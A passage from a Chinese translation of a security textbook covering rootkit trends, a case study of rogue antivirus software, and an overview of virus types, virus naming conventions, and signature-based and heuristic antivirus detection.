Rootkit将不访问主机内存或者CPU,目前的硬件和软件检测机制将无法工作。随着游戏业界持续地要求定制的处理能力而将各种处理单元引入普通的PC,预计研究的发展方向将会包含其他处理单元,例如物理处理单元(PPU)和人工智能处理单元(AIPU)。 目前,还没有发布过使用GPU的概念验证性代码,但是Rootkit.com已经有了一个专门的项目来研究这种方法的能力,并且制作公共的代码来实施研究工作。而且,目前在所谓GPU计算中的趋势已经提高了开发人员在使用GPU进行计算方面投入的开发活动的水平。随着GPU开发社区的扩展,基于硬件的Rootkit开发肯定会兴起。 6.2 定制的Rootkit 定制是最近认识到的技术上的好处之一。你可以购买到几乎任何东西并且将其转换为符合你的个性和需求的产品。从iPod到鞋子,定制都在领导着新技术革命。Rootkit也不会无视这一趋势。和恶意软件构建工具一样,Rootkit(特别是用户模式Rootkit)将使用自动化工具构建。我们已经看到恶意软件构建工具包含了和恶意软件一同部署Rootkit的功能。未来,Rootkit将进行定制以提供特殊的隐蔽类型、执行路径变化以及重新感染选项。Rootkit将从简单的恶意软件外壳发展为攻击工具,攻击者用它来保持对服务器主动地感染和利用。 想象你作为一位管理员,尝试删除一个恶意软件,却发现在你删除恶意软件并且重启机器之后,硬件Rootkit重新在操作系统中以不同的新方式重新安装软件Rootkit,这种Rootkit是你的防病毒或者防间谍软件产品可能无法检测的。Rootkit将开始成为机器的感染管理器,确保恶意软件是无法检测的或者在功能破坏之后能够重新安装的。 防病毒和防恶意软件工具需要进行重要的升级,以处理这些攻击类型。正如我们已经讨论过的,防病毒和防恶意软件在大部分内核模式Rootkit的相同级别上操作;因此,这些工具难以充分地删除或者检测Rootkit。此外,恶意软件中实现的检测、停止或者绕开安全技术的功能将转移到Rootkit中,因为Rootkit传统上运行在比恶意软件更高的特权级,对机器有更多的控制和访问权。 6.3 小结 与病毒革新为具有侵略性的身份盗窃恶意软件类似,Rootkit正在发展为更难以探测的、可定制的和自动化的软件。Rootkit正在适应新的环境,如数据库和应用程序,并且从操作系统中转移到PC硬件上,以便保持安装和工作状态。 Rootkit的定制将推动与当今防病毒和防恶意软件技术相似的新的检测需求。尽管许多安全专家认为基于硬件的Rootkit检测(例如PCI扩展卡或者CPU指令集的新扩展)将会彻底地终结Rootkit问题,但是最新的开发证明并非如此——例如,Joanna Rutkowska在Black Hat 2007上所展示的技术说明了软件能够为硬件Rootkit检测器给出不同的系统RAM视图,使它们失败。本书的作者们认为最好的Rootkit检测技术将是使用硬件和软件的混合方案。 Rootkit的战争正在愈演愈烈,最终用户将因为恶意软件利用高级Rootkit技术而受害。恶意软件的感染将会持续更长时间并且造成更大的破坏,因为Rootkit对恶意软件提供保护并且在它们被删除时进行重新安装。Rootkit开始转移到新的领域,能够产生比以前大得多的破坏力。数据采集与监控(Supervisory Control and Data Acquisition,SCADA)网络、汽车计算机和手机是下一个遭受Rootkit打击的领域。想象一下将其安装在汽车计算机上,它能够阻止防抱死系统的使用或者导致GPS软件再也不能找到特定地址。 本书由“ePUBw.COM”整理,ePUBw.COM 提供最新最全的优质电子书下载!!! 第三部分 预防技术 案例研究:披着羊皮的狼 解决日益增长的恶意软件问题的预防技术和方法有数百种,但是并不是每种方法都有相同的能力,恶意软件预防公司使用的广告和媒体很容易使人误以为很安全。为了说明恶意软件的删除正在变得越来越困难,这个案例研究展示了一些恶意软件预防技术是披着羊皮的狼,它们伪装成恶意软件预防技术,实际上安装更多的恶意软件! 流氓软件 MalwareProtector 2008、Wista AntiVirus、Antivirus 2009!这些“产品”有很美观的网站和推销其删除数百种恶意软件变种能力的用户界面。这些产品看上去真的好像能寻找威胁,并且以很合理的代价删除它们。一般的用户不会感觉到这些流氓安全产品实际的代价。为虚假的产品付费使用户面对各种问题,例如丢失敏感数据,或者遭到进一步的恶意软件攻击,代价甚至要高于虚假产品本身! 访问错误的网站或者从朋友的email及聊天会话中单击指向可疑网站的链接,你可能会收到一个弹出窗口,告诉你“这个文件已经100%进行了数字签名并且经过独立验证,为100%没有病毒,也非广告软件和间谍软件。”如果你单击OK按钮,这个软件将立即扫描你的系统中的威胁。看上去这是个好主意,许多用户会单击OK按钮。 注意:本案例中插图里的URL都被删除,以防读者不小心访问可能在机器上安装恶意代码的网站。 一旦你单击OK按钮,软件弹出并且似乎在你的机器上寻找危险的间谍软件,如果它很快就找到间谍软件,那么这个应用程序肯定是好的。当你单击“删除所有”按钮时,你的浏览器提示你打开或者下载一个与你刚刚运行的防恶意软件程序名称相似的新文件。所以你单击“运行”按钮,认为这是开始清除过程所必需的。 程序下载并且执行,通知区域出现一个漂亮的图标,显示该软件正在保护你。由于这个软件已经下载,用户必须在浏览器中的两个提示上选择同意,允许程序执行。这里没有使用任何利用程序——只是出色的老式心理战术。 接下来软件很快地尝试清除发现的恶意软件。通常会有一个消息出现,说明软件已经过期,你必须正确地更新软件才能清除恶意软件。打开另一个浏览器窗口,将你重定向到一个似乎合法的网站,要求支付一小笔款项来订阅更新。你寻找每个安全专家都曾经告诉过你的锁状图标来确定该网站合法。锁状图标告诉你该网站使用加密通信通道,远程服务器的身份与加密证书相符。你看到锁以后继续订购更新。然后软件“更新”并且“清除”恶意软件。 祝贺你!你已经从机器上清除了恶意软件!或者你是这么想的。 这些流氓安全产品一般有什么共性呢? 出色的界面 一般来说,流氓安全软件创建者花费很多时间创建一个美观的界面,足以与合法的商用防病毒软件供应商竞争。光滑简洁的图标、看上去与商业供应商相似的功能性、关注营销,以及好像“有效”的简单过程——组成杰出的用户体验和界面的所有元素。 尽管界面可能看上去很好,内容却常常没有恰当地组合在一起。例如,文本包含不恰当的英语,使用俚语或者具有自相矛盾的内容。 网站和应用程序一般也非常友好并且充满了花哨的词,使用户感觉他需要这个应用程序。每当用户尝试离开网站,例如单击关闭按钮、浏览器的返回按钮等,就会看到一个弹出窗口,请求用户不要离开,因为计算机可能仍然受到感染。几乎所有这种网站都以恐吓作为主要手段。 有时它们真的有效 一些流氓软件确实能删除恶意软件。它将删除成为其竞争对手的恶意软件,确保自己留在你的工作站上,这样你就会订购它。通过删除安装在你的机器上的其他恶意软件,流氓软件成为完全控制你的工作站的统治性恶意软件。流氓软件做一些好事,但只是为了推进自己的目标。而且,流氓软件将安装间谍软件或者木马来捕捉信息。在我们的案例中,AntiMalware2009是一头狼!AntiMalware2009不会真的删除任何恶意软件,但是它假装删除恶意软件,同时下载和安装zlob木马。zlob木马提供给攻击者远程管理权限,意味着匿名的攻击者能够登录你的计算机,并且访问你的所有私有信息包括银行账户和个人文档。 部分删除其他恶意软件使流氓软件这头狼看上去像一只羊,也就是好的恶意软件预防技术。那么你如何知道自己下载的是一头狼还是一只解决你的恶意软件问题的羊呢?在为你的恶意软件问题寻找解决方案时,要确保使用业界承认和安全专家以及安全论坛推荐的预防工具。并不是每种预防工具的制作都一样,每年在预防技术上的投资都高达数百万美元。 如果你从未听说过一种工具,那么试着搜索该工具的名称,并且看看对这个工具有什么评论。大部分能够下载的流氓预防软件已经被发现和分析过,像Symantec和McAfee这样的公司有网页和博客帖子描述流氓软件所导致的问题和删除它们的方法。记住一句老话,“一分钱一分货”,要提防没有大的社区追随的完全免费的预防工具。 第7章 防病毒 这些年来计算机安装防病毒软件已经是意料之中的事情。当你在Best Buy或者Dell网站上订购一台计算机时,防病毒软件就与系统捆绑。联邦政府和私有企业的计算机安全策略现在都要求在所有连接到它们的网络的系统上安装防病毒软件。家庭用户依靠防病毒软件保护系统和数据免遭恶意的病毒、蠕虫、木马、间谍软件、广告软件和其他基于互联网威胁的宿主的侵害。这种情况已经持续了接近10年,对于防病毒公司来说显然是桩好生意,但是对于消费者来说好不好呢?防病毒技术真的有效吗?它是如何工作的,是否具备可持续性? 在本章中,我们将介绍当今市场上几乎所有防病毒软件中常见的特性和技术。然后,我们将重点关注关于防病毒技术有效性的争论,以及业界在近年来为了生存所做的努力。 7.1 现在和以后:防病毒技术的革新 蠕虫和病毒有着可以占据本书很多篇幅的肮脏而漫长的历史。坦率地说,我们认为它们可以让你厌烦得想哭(更不用说,Viruslist.com,http://www.viruslist.com/en/viruses/encyclopedia?chapter=153311150上可以自由获取的那些信息)。更重要的(并且没有被很好地写入文档)是,防病毒技术的革新已经随着病毒的发展而同步进行,也就是说,防病毒软件以有疑问的方式调整策略以占得先机。这种猫抓老鼠的游戏是我们在Rootkit作者和防Rootkit技术的斗争中已经看到的熟悉概念。一种技术的进步迫使另一种技术也发展,导致了没完没了地交替领先的循环。 防病毒世界中的这种猫抓老鼠的游戏开始于20世纪80年代末,这是因为一些简单的感染磁盘上计算机程序的文件病毒。病毒通过可移动媒体如软盘来传播。在那个时候,简单的防病毒应用程序在磁盘上检查这些恶意文件的存在并且删除它们。从这一概念中产生了业界巨人:Norton,防病毒业界也由此而生。 为了对抗不断成长的检测业界,病毒作者采用了更先进的感染和传播方法。20世纪90年代中期互联网的兴起是这些病毒完美的滋生和繁殖的土壤,很快病毒的传播能力随着电子邮件发展成为个人和企业使用的主要通信来源而变得几乎没有限制。防病毒软件改变了自己的方法,对发出的邮件也扫描病毒。免费的webmail服务如Yahoo!添加了病毒扫描能力,以帮助避开这种威胁。在其他产品中也发生了类似的革新,例如Web浏览器和电子邮件客户端中以工具栏和附件形式提供的功能。 今天,我们发现自己的身边有大大膨胀的价值100亿美元的防病毒行业和大约40种商业和免费的防病毒产品(http://adl.csie.ncu.edu.tw/uploads/CloudAV.ppt)。威胁也同样膨胀了。根据2009年1月发布的Sophos威胁报告(http://www.sophos.com/sophos/docs/eng/marketing_material/sophos-security-threatreport-jan-2009-na.pdf),电子邮件附件感染率在2008年中达到最高点,在互联网上每发送200封电子邮件就会有1次感染。更糟糕的是,这些受感染的邮件中31%含有一个试图下载多种恶意程序的后门或者木马,这些程序用于各种目的,例如窃取密码和信用卡信息。同一个报告还概述了这些威胁的严重性,预测在2009年中将会变得更加无情和难以发现的手段。具有讽刺意味的是,这个结论也强调了防病毒公司在近年来努力证明自身的有效性和实用性的原因。 警告与声明 我们要事先声明一点,我们不打算特别推荐或者贬低任何防病毒产品。我们的目标是提出事实,使读者能够根据这些事实和当前的趋势作出明智的决定。我们还提供了有限来源的一些图表,因为很难得到主动测试防病毒产品的资料。这些资料提出的测试结果应该稍稍带着一点疑问去看,读者应该从本章介绍的数据中得出自己的结论。 而且,这些结果都不试图验证任何产品的精确性或者“诚实性”。因此,将每个恶意软件样本都作为病毒报告的产品显然说明了最高的检测率。 和以往一样,通常的意见是使用常识;因此,责任自负。 7.2 病毒全景 在进入围绕防病毒产品的问题之前,我们希望介绍病毒本身的有关方面——分类、分级以及命名惯例。所有这些方面都影响防病毒产品的性能和范围。我们还将快速地回顾当今感染计算机系统的主要病毒类型。 对于确定威胁、潜在影响以及事故响应及/或处理的计划来说,理解每类病毒的能力是很重要的。病毒一般在专门的环境中操作,例如文件系统、启动扇区或者宏。我们将关注典型的文件和启动扇区病毒,它们已经在公众的视野中存在了超过25年;宏病毒的开发、发展和成功;以及复杂病毒的革新。本章稍后,我们将介绍每类病毒的实例,以阐述现实世界中的病毒以及它们成功的因素。 7.2.1 病毒的定义 作为定义的出发点,我们坚持病毒是一个设计用来在未经用户同意的情况下修改目标系统的程序。为了这个目的,或者因为试图达到这个目标的副作用,病毒可能将自身复制到多个存储位置(连接的磁盘)以及网络上的其他主机,修改磁盘或者内存中的系统对象,或者以某种方式破坏常规的系统操作。病毒倾向于破坏系统、连接的设备以及数据。病毒不应该与相关的术语如蠕虫、特洛伊木马、后门和其他恶意软件混淆,虽然所有这些软件产品的功能互相重叠。下面是对各种恶意软件之间的区别的一个概述: ·特洛伊木马 声称或者似乎有某种功能,但是同时包含不受欢迎或者未声明的功能的一种程序,通常给某些人对计算机未经授权的远程访问权,或者下载其他恶意软件。 ·蠕虫 通过网络感染主机而自主繁殖的一种程序。 ·后门 绕过常规验证或者连接方法,提供到计算机的未经授权访问的一种隐蔽性程序。 另一种类似恶意软件的程序是灰色软件(grayware),通常包含广告软件和间谍软件,这些程序不像恶意软件那么危险,但是仍然会降低系统性能,弱化系统安全态势,暴露新的漏洞,而且一般安装可能影响系统可用性的令人烦恼的应用程序。 另一方面,病毒感染现有的程序和应用,并且通过感染主机上的这些应用程序传播。根据病毒的具体目标,它还可能使用特权系统功能提升权限,甚至为了保护自己而安装一个Rootkit。大部分病毒不试图隐蔽,除非病毒很先进并且包含多态功能。 计算机病毒在许多方面上类似于生物学上的病毒:依赖一个宿主存活,并且具有可用于识别和预防病毒的代表特性。 防病毒产品原来是用于预防程序受到已知病毒感染的。从那时起,防病毒产品与不断增长的各类恶意软件和灰色软件一起发展,并且总是宣传自己发现所有类型恶意软件的能力。但是本章仅仅关注病毒。 7.2.2 分类 病毒研究人员使用一种分类系统来区分病毒,以维护病毒研究领域和信息共享中的秩序。我们不过多地纠缠于计算机病毒命名管理标准以及过去18年中更新的缺乏——这是令Symantec(http://www.symantec.com/avcenter/reference/virus.and.vulnerability.pdf)和其他防病毒供应商都感到沮丧的一种看法,而是提供得到普遍接受的命名惯例的简单参考指南。1991年,计算机防病毒研究组织(Computer AntiVirus Researchers Organization,CARO)成立了一个委员会为病毒研究提供标准的命名惯例。商定的惯例是: 家族名.组名.主变种.次变种[:修饰语]@后缀 这种命名惯例的每个部分只能使用字母和数字字符,不区分大小写。可以使用下划线和空格以增加易读性。每一段都应该限制在20个字符以内。 表7-1详尽解释了CARO命名惯例的每个部分。 表7-2是一个病毒名称前缀的总表,前缀始终是大写的并且长度不超过5个字符。Symantec在其网站上提供一个详细的列表(http://www.symantec.com/security_response/virusnaming.jsp)。 7.2.3 简单病毒 在本小节中,我们将介绍几种病毒类型及其特性。这些病毒都被称为简单病毒或者病原体病毒。这些程序是过去四分之一个世纪中恶意软件的骨干。 文件病毒 除了前面定义的病毒基本目的之外,文件病毒还可以感染磁盘上的一个或者多个可执行二进制程序。这通常意味着为该文件添加功能,但是也就部分或者完全覆盖了文件。这种类型的病毒通过在可信任的文件中隐藏自身来达到隐蔽的目的,所以下次用户装入文件时,病毒得以执行。但是,正如病毒的定义所说的,隐蔽性不是首要的目标。 为了进行这些操作,病毒必须使用某种感染方法,表7-3显示了用于感染系统的常见方法。 启动扇区病毒 启动扇区病毒设计用于感染系统硬盘的主引导记录(MBR)。主引导记录是启动扇区的一种类型,存储关于磁盘的信息,比如分区的数量和类型。在驱动器构造中,MBR始终位于柱面0、磁头0、扇区上1。 启动过程由系统BIOS在固件中开始,然后转移到安装的操作系统,这由MBR指出。启动扇区病毒仅仅感染了系统上的MBR;BIOS执行这个病毒而不是操作系统。 病毒必须存在于计算机系统上的第一个启动设备的启动扇区才能得以执行。这种启动顺序很容易在现代BIOS程序中修改而指向CD-ROM、USB设备或者软盘。如果系统从未受感染的媒体上启动,病毒将不会装入。 宏病毒 宏病毒在20世纪90年代中期由于Microsoft Office套件流行而流行,应用程序宏(或简称宏)是一个指向通常重复执行的任务的编程快捷方式。宏虽然非常有用和便利,但是也非常有破坏性。宏以Microsoft Visual Basic for Applications(VBA)编写,当Microsoft Office应用程序装入时Word Basic可以自动装入。例如,用户接收到一个电子邮件,包含Word文档附件并打开。这个Word文档启动,宏病毒就被装入到目标系统。宏病毒的自动装入可以通过几百种不同的宏类型以及支持文档绑定宏的任何应用程序来完成。Microsoft应用程序常常成为这种类型病毒的目标,这是因为它们的整体流行性/采用率、广泛的集成性以及宏的支持。 大部分应用程序已经默认禁用了许多宏控件或者要求运行宏时进行用户交互。Microsoft Office隔离转换环境(Microsoft Office Isolated Conversion Environment,MOICE,http://support.microsoft.com/kb/935865)是由Microsoft开发的一个免费工具,通过动态地在一个隔离的沙箱里将二进制Microsoft文档转换为更新的开放XML格式,帮助阻止宏病毒的运行。这一转换删除了可能导致病毒装入和成功运行的任何恶意内容。美国国家安全局(NSA)在公开的《Mitigation Monday》(http://www.nsa.gov/ia/_files/factsheets/MitigationMonday.pdf)文章中建议将MOICE作为基本的安全措施。 7.2.4 复杂病毒 在本小节中,我们将关注复杂的病毒如何在病毒开发和检测之间不断的“军备竞赛”中得到发展。在防病毒开发公司持续地对抗全球病毒的同时,病毒的开发也保持着创造力,寻求新的技术来躲避防病毒软件。 加密病毒 加密病毒是避免被防病毒软件发现的努力中的第一个重大突破;加密引擎将加密文本,帮助躲避简单防病毒引擎的ASCII或者十六进制检测扫描。这种病毒的思路是加密病毒负荷并且采用一个自解密模块,以便在运行时执行代码。这阻止了防病毒扫描程序通过旧的特征码检测方法发现病毒。但是,防病毒软件特征码检测技术已经发展为以解密模块本身作为焦点,这个模块在以前发现的病毒副本中找到并且进行了分析。 寡型病毒 在解密例程经常被防病毒产品检测到之后,加密恶意软件的下一个符合逻辑的步骤就是将解密例程本身随机化。寡型代码(oligomorphic code)是一种代码样例,能够在多种解密程序中随机选择以感染目标。这使寡型病毒能够利用多种加密程序将基本的加密病毒提升到一个更高的水平。寡型病毒和多态病毒(接下来会说明)一样能够改变加密程序;但是,它不能改变加密的基础代码。一些病毒能够创建多个加密程序模式,每一代都变得无法辨认,从而避免了基于特征码的防病毒检测。 多态病毒 病毒中最常见的代码变形类型是多态。多态病毒(polymorphic viruse)能够创建不限数量的新加密程序,这些加密程序都能使用病毒体上的不同加密方法。多态引擎被设计用于伪随机码生成器,以及创建多种伪造代码变形的技术,以便混淆病毒代码主体。这使该病毒极其难以检测。 变形病毒 变形病毒(metamorphic viruse)不同于多态病毒,它们不包含不变的病毒体或者解密程序。在新一代中,病毒体本身都进行足够避开检测的变形。这种变形代码封装在一个能够携带病毒代码的代码体中。变形代码的最大特征是没有完全地修改代码,而仅仅修改其功能,例如,寄存器交换、修改流控制以及重新排序独立指令。这些相对不明显的语义变化不影响病毒的能力,却能够轻易地欺骗许多防病毒产品。 入口点混淆病毒 复杂病毒值得一提的最后一种类型是入口点混淆(entry-point obscuring,EPO)病毒。这种病毒设计为在现有的程序中以补丁或者更新的形式在随机的位置上写入代码。然后,当刚刚被感染的程序执行时,就跳转到病毒代码并且开始执行病毒而不是可信任的程序。现在病毒可以从机器上可信任的程序上执行,防病毒引擎不太可能发现这种执行方法。这个病毒家族现在非常常见,并且能够长时间地在系统上不为人知地进行操作。 7.3 防病毒——核心特性和技术 防病毒产品的终极目标是保护端点主机免遭恶意软件(具体地说,就是刚刚讨论过的病毒类型)的侵害。因此,防病毒产品一般安装在主机上并且运行各种服务以及一个或者多个代理,这些被统称为防病毒引擎。检测引擎有两种主要的系列:手工或者按照需要(on demand),实时或者访问时(on-access)。 7.3.1 手工或者“按需”扫描 防病毒产品的最基本功能是在用户指示时扫描文件。这种情况通常包括注意安全的用户在下载一个程序和或者文件附件时启动对该文件的按需扫描。因为这种方法要求用户交互以启动扫描,不能保护系统免受大量动态恶意软件(例如在文档打开时执行的宏病毒)的侵害。如果用户没有意识到宏病毒,他不会知道在打开之前扫描文件。甚至用户进行了扫描,检测也只能达到防病毒产品及其底层引擎的水平。不管哪种情况,都不能保证发现所有病毒。 按需扫描实际上是一种脱机扫描,这意味着被扫描的文件保存在磁盘上而且未被执行。防病毒引擎将检测磁盘上的文件并且将其与特征码数据库(我们将很快谈到特征码扫描)中的二进制特征码进行比较。如果防病毒引擎发现匹配的文件,防病毒程序将警告用户该文件已被感染并且提供各种建议的操作,例如删除、改名或者隔离文件。隔离文件一般包括防病毒产品将文件移到硬盘上的一个隔离文件夹中,禁用该文件并且标识为不可执行的,这样就防止该文件被用户无意中执行。 因为这种检测类型依赖于用户启动扫描,大部分防病毒产品都将其作为辅助产品功能。最有用的扫描在一个或者多个动态、实时的组件中提供,在用户工作时透明地进行主动的病毒扫描,这被称为访问时扫描。 7.3.2 实时或者“访问时”扫描 访问时扫描通常在用户不知情的情况下发生。在用户打开应用程序、读取电子邮件或者下载Web内容时,防病毒引擎不断扫描系统内存以及磁盘寻找病毒。如果检测到一个病毒,防病毒产品将首先试图停止恶意活动(例如,如果是一个网络活动,防病毒产品将阻塞这个活动),然后通知用户采取措施。这种扫描类型与脱机风格的按需扫描相反。 访问时扫描是当前市场上所有主流防病毒产品的主要检测方法。这种类型的检测的实现细节当然是专利,但是每个供应商都使用著名的技术来检测病毒。实际上,你可能注意到第4章中讨论的技术中引人注目的相似性。访问时扫描程序将自身插入到操作系统和请求资源的应用程序之间。例如,如果病毒试图修改注册表键值,它将通过访问时扫描程序路由,扫描程序将会扫描病毒,如果发现该病毒的特征码,引擎将发出感染警告。 访问时和按需扫描在保护计算机免遭数千种活跃的安全威胁侵害的重要任务中互为补充。几乎所有防病毒供应商都组合这两种扫描引擎以创建更健壮的产品。访问时保护确保用户在日常处理文件和程序时有某种“实时”保护,并且帮助阻止用户可能没有或者无法手工扫描的恶意程序。访问时保护增加了新引入的可执行文件在执行前得到扫描的可能性。最好的做法是定时运行自己的按需扫描。定时的脱机扫描能够帮助检测在实时引擎投入运行之前装入的恶意程序。 7.3.3 基于特征码的检测 基于特征码的检测从业界刚刚出现时就为防病毒公司所用。这是防病毒产品的收入来源,因为它代表着已知恶意病毒的列表,保持这个具有不确定的未来的行业的现金流稳定性。防病毒公司依靠消费者和公司的订阅作为收入的稳定来源。这些订阅包括产品更新和补丁,但是最重要的是每天/每周分发的特征码更新文件,这保证用户的防病毒产品具有最新的病毒特征码。 特征码本身可能很简单,像字符串模式匹配或者字节特征码,也可能是复杂的检查可疑文件特性以估计其功能的计分系统。字符串匹配特征码可以包含通配符,具有足以检测病毒在执行中试图变形而进行的填充或者垃圾数据的灵活性。特征码模式和格式在各种防病毒产品中各有不同,每种产品都使用不同的算法和逻辑来选择病毒的特性标识,以此形成特征码。但是,基本的过程包括了反汇编已知病毒的二进制代码,并且记录实现病毒核心功能的字节顺序。字节顺序特征码的一个非常简单的例子是检测可执行(PE)文件,这是Windows系统上每个可执行程序必须包含的格式,检测的方法是扫描文件寻找MZ header字节序列4D 5A。每个PE文件都包含着两个字节。字节顺序特征码的更实际例子是大部分病毒用作源代码一部分的著名加密或者压缩程序库(例如UPE(Ultimate Packer for Executables))。 其他类型的特征码基本上是一个用于计分系统的模板,在扫描引擎逻辑中实现,并且依赖于扫描中动态填写的特征码模板。模板实例应该包含各种可能的恶意文件属性,例如程序使用何种程序库(也就是允许互联网连接性、加密的程序库和敏感系统程序库),文件是否打包或者压缩(病毒常常将文件打包以避开特征码检测引擎);是否具有加密/解密例程(这可能表明其加密自身的代码以躲避防病毒检测);以及文件(如果是可执行文件)的可移植可执行文件头部分中的其他属性,这些属性可能表明用于欺骗特征码扫描程序的篡改或者无效值(例如无效的程序入口)。 除了非常基本的常规表达式模式匹配和有些“实时性”的特征码模板以外,特征码本身没有太多固有的动态能力。最终,对于所检测的病毒必须有精确的特征码匹配,正如我们已经说明过的那样,病毒很少有这种可预测性。 基于特征码的检测有多种经过证明的弱点: ·依赖于必须不断更新的特征码数据库,需要供应商(生成列表)和消费者(下载/安装)两方面的工作。 ·特征码数据库是某个时点的静态快照,在发布给消费者后立刻就过时了。 ·存在着数十万种病毒,每种病毒都可能有数千种分支和变种,这些都需要不同的特征码;这还只包含防病毒公司所知晓的病毒。 ·只能检测具有特征的病毒。 ·自修改的恶意软件如多态病毒将挫败基于特征码的检测引擎。 一家独立的防病毒测试集团av-test.org的测试结果表明,防病毒产品相当擅长于根据特征码检测病毒(http://www.sunbelt-software.com/ihs/alex/Results_2D2008q1_20_282_29.xls)。在大约100万个病毒样例中,28个防病毒产品中有20个使用基于特征码的检测正确地发现了超过93%的样本。但是,这并不能表明防病毒产品防御威胁的能力——这个结果只表现了防病毒公司编写特征码的能力。你应该考虑到在具有15年的实践经验后,防病毒供应商应该相当擅长于这一过程。 7.3.4 基于异常/启发式检测 启发式检测试图弥补基于特征码检测的缺点,并且在发现病毒和防病毒供应商制作和发行特征码之前为最终用户提供基本的防御。启发式检测不扫描系统寻找已知的静态特征,而是观察系统行为和关键的“挂钩点”,以主动的方式发现异常活动。启发式技术的一些实例包括: ·检查经常被恶意软件侵害的关键系统组件,例如SSDT、IDT以及API函数的钩子。 ·行为阻塞——剖析或者建立应用程序常规行为基线——当应用程序表现出异常的行为时,可以认为应用程序可能出现破坏(MS Word试图连接到互联网是一个例子)。 ·内存属性监控——换句话说,如果内存页面标识为可执行,它将受到比不可执行内存更紧密的监控,特别是该属性在运行时出现变化的时候。 ·文件二进制代码中程序可移植可执行(Portable Executable,PE)段信息的分析,寻找残缺的部分或者用于欺骗分析引擎的无效项目。 ·一个进程或者程序中不规则代码及/或字符串的存在。 ·关注多个区域的基于权重和规则的计分系统。 ·打包、混淆或者加密代码/段的存在。 ·分析反编译/反汇编代码,确定异常操作,如静态(并且有效)的地址与指针的计算。 ·使用人工智能中的专家系统概念,凭借这种产品根据数据集学习行为预测。 防病毒产品在启发式检测功能中已经取得了显著的进步。启发式引擎能够进行这种类型的分析是因为它们实际上类似于调试程序。它们能够模拟虚拟内存、从内存中解析数据结构,分析运行程序中的代码执行和数据流,并且动态地反汇编程序代码。这些启发式措施都是实时、自动运行的,并且不同程度地影响系统性能。 这种类型的检测的主要缺点是,相比基于特征码的检测,会出现更多的假阳性;也就是说,启发式检测会错误地将实际上无害的程序或者文件标识为恶意软件。启发式引擎实际上必须对分析下的程序和周围环境做出许多基于事实的猜测和假定。因为密集的处理开销,启发式引擎对系统性能和存储要求也有更大的影响。执行启发式分析需要额外的代码,以及第三方组件(如协议解析程序),这就造成了更容易出错的代码以及更多的漏洞。 7.4 对防病毒技术的作用的评论 我们已经描述了防病毒技术的功能和技术细节,但是现在我们将转而讨论在计算机安全界中防病毒所起的作用。这种作用是有争议的,并且已经争论了许多年。我们将从好的一面开始讨论。 7.4.1 防病毒技术擅长的方面 对于防病毒技术来说有个好消息,它们拥有一席之地并且在某些方面做得很好。正如7.3.3节所说明的那样,防病毒技术在检测至少具有一个已知特征的病毒时有非常高的精确性。对于最好的10~15个防病毒产品,这方面的检出率超过98%。这种能力是很重要的,因为它摘到了很多“靠近地面的果实”——也就是说,还存在于世上的已经流行了10年的恶意软件。这类恶意软件很容易被最现代的防病毒引擎捕捉到。简而言之,防病毒技术一般都擅长捕捉已知的威胁。 安全专家不应该太快就不考虑这种功能。在当今的高度分布式的企业网络中,基本的系统和网络健康难以维护。强大的防病毒解决方案被看做是必需品,是系统健康的基本需求。根据IBM X-force报告(http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-report.pdf),2008年最流行的10种浏览器利用程序早在2005年就出现了,这意味着大部分的病毒正在使用很容易通过基于特征码检测而发现的攻击方式。对于大部分集团企业来说,防病毒方案是一种速效药。 作为集团防病毒策略的一部分,基于主机和网络级别的控制能够大大改进整体安全态势,尤其是当这种控制与病毒感染和蠕虫传播相关时。在涉及一个企业防病毒策略时,基于网络的控制,例如网络入侵检测系统(NIDS)、防火墙、网络访问控制(NAC)设备以及安全信息管理器(SIM),都是基于主机的软件的补充。恰当地配置和维护的规则、警告和过滤器能够从低级别到企业范围的事件中避免病毒攻击。 通过这些设备收集的信息记录,能够大大地增进对潜在的病毒威胁和可疑事件的了解。正确地配置和维护这些设备将会对避免病毒和蠕虫大有帮助,并且为需要监控和响应病毒事件的人提供优秀的信息。 防病毒还能够为普通家庭用户这一相当大的客户群提供服务。防病毒产品能够令人安心,有些时候考虑防病毒技术的候选方案是没有必要的——老奶奶不需要在一个虚拟机中上网冲浪。在这种系统中,现成的防病毒产品就能满足。 7.4.2 防病毒业界的领先者 在本章开头我们说过不会宣传任何特定的防病毒解决方案,也确实会遵守这一原则。我们只是报告事实。2008年中发行的两个独立的研究结果见表7-4(http://www.avcomparatives.org/seiten/ergebnisse/report19.pdf)。 在表7-4中,第二列指出了产品对于实验中使用的两个数据集的基于特征码的检测率(SBDR)。恶意软件数据集由大约110万个恶意软件样本组成,包括宏病毒、脚本恶意软件、后门、bot程序、蠕虫和木马。一个数据集是非常新的,用于测试公司的特征码制作周转时间,而另一个数据集是比较旧的。假阳性率差不多与这个表中的情况相反。Microsoft和McAfee Home Edition只得到了一颗星的评价,具有最低的假阳性率,整个扫描中只有一次假阳性。领先者一般有中等或者更高的假阳性率。实验中的另一个度量是扫描时间,这是一个喜忧参半的结果,Symantec远远胜过其他竞争者。所有结果中始终不变的是,VBA32在每种测试中的结果都不理想。 表7-5中的是第二种独立评估,由AV-Test.org进行(http://www.sunbelt-software.com ihs/alex/Results_2D2008q1_20_282_29.xls)。 这次评估使用的实验数据由超过100万种恶意软件样本组成。这个测试也研究假阳性率、HIPS/行为阻止、响应时间和Rootkit检测率。有趣的是,只有下面的4种防病毒产品能够检测所有12种Rootkit样本:F-Secure、Panda、Symantec和Trend Micro。 在我们从这些测试结果继续下去之前,有必要指出(正如AV-comparatives.org的实际报告结果中强调的——http://www.av-comparatives.org/seiten/ergebnisse/report19.pdf,第3部分“评论”)这些测试都是在防病毒产品的最严格操作方式(最高的设置)下进行的。换句话说,产品被调整为尽可能多疑的。对于大部分产品,这个模式是默认的,但是一种产品的“高”和“低”的定义可能与另一种产品有很大的不同。表7-6展示了测试产品的默认操作模式。为了体会这些信息的价值,考虑Avira在默认模式“中”情况下是领先者,击败了其他启用了最大检测能力的产品这一事实。 我们指出这一点是因为某些产品在配置和扫描设置调整后会强大许多。用户应该知道这一事实,并且确保自己的防病毒产品已经得到正确的配置。关于这些默认设置的更多细节请参考http://www.av-comparatives.org/seiten/ergebnisse/report19.pdf上的AV-comparitives.org报告。 7.4.3 防病毒的难题 